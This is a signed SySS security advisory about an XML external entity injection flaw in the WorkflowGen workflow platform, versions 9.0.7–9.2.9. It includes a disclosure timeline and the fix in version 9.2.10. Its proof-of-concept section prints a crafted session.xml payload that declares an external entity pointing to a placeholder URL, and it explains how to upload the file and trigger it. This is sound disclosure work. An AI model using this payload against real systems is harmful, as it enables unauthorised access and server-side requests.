-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-052 
Product:                   WorkflowGen
Manufacturer:              Advantys Solutions Ltd
Affected Version(s):       9.0.7 - 9.2.9
Tested Version(s):         9.0.7
Vulnerability Type:        Improper Restriction of XML External Entity Reference (CWE-611)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2025-08-11
Public Disclosure:         2025-09-29
CVE Reference:             Not yet assigned
Author of Advisory:        Dennis Kurz, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

WorkflowGen is an application to automate processes.

The manufacturer describes the product as follows (see [1]):

"WorkflowGen offers a low-code/no-code platform to automate complex, human-
centric processes enhanced by AI agents, providing high configurability."

Due to an unsecure configuration of the XML parser, the application is 
vulnerable to external entity injection.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The security configuration of the XML parser allows the definition and 
loading of external entities when parsing XML files using a specific 
function. This can be exploited by uploading a malicious XML file and 
initiating a process instance with parameters that point to the uploaded 
file (cf. SySS Security Advisory SYSS-2025-053). 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The upload function of a form can be used to upload the malicious XML file.
After the upload, the process instance can be restarted with parameters
that point to the uploaded file. An XXE injection is achieved using the 
session.xml state file. The session.xml file will be parsed when finishing
one step of the form.

With the following session.xml file, a successful XXE injection can be 
achieved:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "https://<URL>">
]>
<Session>
[...]
<BackUrlSubmit>&xxe;</BackUrlSubmit>
</Session>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has released version 9.2.10, which addresses this vulnerability.
It is advised to upgrade to version 9.2.10 or later.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-07-21: Vulnerability discovered
2025-08-11: Vulnerability reported to manufacturer
2025-08-26: Enquiry about the status of the vulnerability
2025-09-04: Solution provided with release of version 9.2.10
2025-09-05: Enquiry about the status of the vulnerability
2025-09-17: Confirmation from a customer that an update was provided
2025-09-22: Enquiry for confirmation that the vulnerabilities were 
            addressed by the update
2025-09-29: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for WorkflowGen
    https://www.workflowgen.com
[2] SySS Security Advisory SYSS-2025-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-052.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dennis Kurz of SySS GmbH.

E-Mail: dennis.kurz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Dennis_Kurz.asc
Key ID: 0x75CC91B4103E513B
Key Fingerprint: 0B17 953A 516B B560 C4F7 8EB1 75CC 91B4 103E 513B 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEECxeVOlFrtWDE946xdcyRtBA+UTsFAmjaRlAACgkQdcyRtBA+
UTvunw/8Dw3vDWC+6Ld6b0yaA3yNijFp0pajD8ZFYxa3Ej6uOQRn+23lmo/CqMc0
c6N1folHjUG3bccqY1ZihX/jRNrUWQmDG7EwB1ub1MX9xmwmceXynDcHogBlTxfh
C9dVQpfWDK6m1Q1GUy70oHF2gxMXtxapsKaJR+Kz+/7swRVqfIVyelh1+uHH2wg/
opGU1gGIcWE6ifVrYNI2I48no3AqwK81VfzHVJuKXPb+h8ipN4WQKPLBanZS5vp5
KJfqL40J+bpLraMOmWjIcWdtzhIPrPaWPi0MbspVGWUUWnUUi7fAam0/szOETsOI
Sm0RY7BSv3YHOwdTrASKBU8xi6zfcVaoZ6QruRDzkvxvhzlJispRw9MllWkQ+sih
Kvm2TTG92+pSxVq2CtGbww4ytVfg3XEHjR9pxVHOYp7rc9xTF83OL9xl1Qim1HnX
JVthYfILww3eUflah/OsEHqkBv9EKHMm8HkzP+p/WXw8DZjcXXOKs0c+MITWxq5D
VSV8FZ62I3f72iGiOdlmKSu9+DIUkc6t2TpkyKDqDLK5hDo3kVHHjoSkRXtAsjBF
SC3kZQHXg/+2PBxY2h5Iht7ETYZuCQU6CaA8DCgthw1NbJbzDw/R45zVg1jN77sd
8YljgRSUH/1OiSTLoILXwMrDgq1Y025dNbQrQ556gzKax5drDp0=
=65zA
-----END PGP SIGNATURE-----